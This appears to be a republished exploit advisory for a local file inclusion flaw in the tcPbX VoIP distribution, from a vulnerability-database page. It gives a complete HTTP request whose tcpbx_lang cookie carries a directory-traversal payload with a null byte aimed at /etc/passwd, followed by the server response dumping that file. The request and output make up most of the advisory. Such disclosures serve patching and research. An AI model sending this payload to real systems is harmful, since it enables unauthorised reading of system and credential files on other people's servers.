Lucene search
K

tcPbX - 'tcpbx_lang' Local File Inclusion

🗓️ 19 Aug 2016 00:00:00Reported by 0x4148Type 
zdt
 zdt
🔗 0day.today👁 32 Views

'tcpbx_lang' Local File Inclusion in tcPbX VoIP Distr

Code
Vulnerable hardware : tcpbx voip distro
Vendor : www.tcpbx.org
Author : Ahmed sultan (@0x4148)
Email : [email protected]
 
Summary : According to the vendor's site ,
tcPbX is a complete and functional VoIP phone system based on Asterisk open
source software and CentOS operating system.
The simplified installation and the new administration portal allow you to
have a full featured phone system in less than an hour without specific
skills on linux or asterisk
 
Vulnerable file : /var/www/html/tcpbx/index.php
The software suffer from LFI flaw because of the tcpbx_lang parameter isn't
sanitized before being proceeded in the file
 
Request
GET /tcpbx/ HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:47.0)
Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: tcpbx_lang=../../../../../../../../../../etc/passwd%00;
PHPSESSID=cupsei1iqmv2bqa81pkcvg4jg1
Connection: close
Cache-Control: max-age=0
-----------------------------------
Response
HTTP/1.1 200 OK
Date: Fri, 19 Aug 2016 15:45:30 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23874
 
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
postfix:x:89:89::/var/spool/postfix:/sbin/nologin

#  0day.today [2018-04-11]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 Aug 2016 00:00Current
7.1High risk
Vulners AI Score7.1
32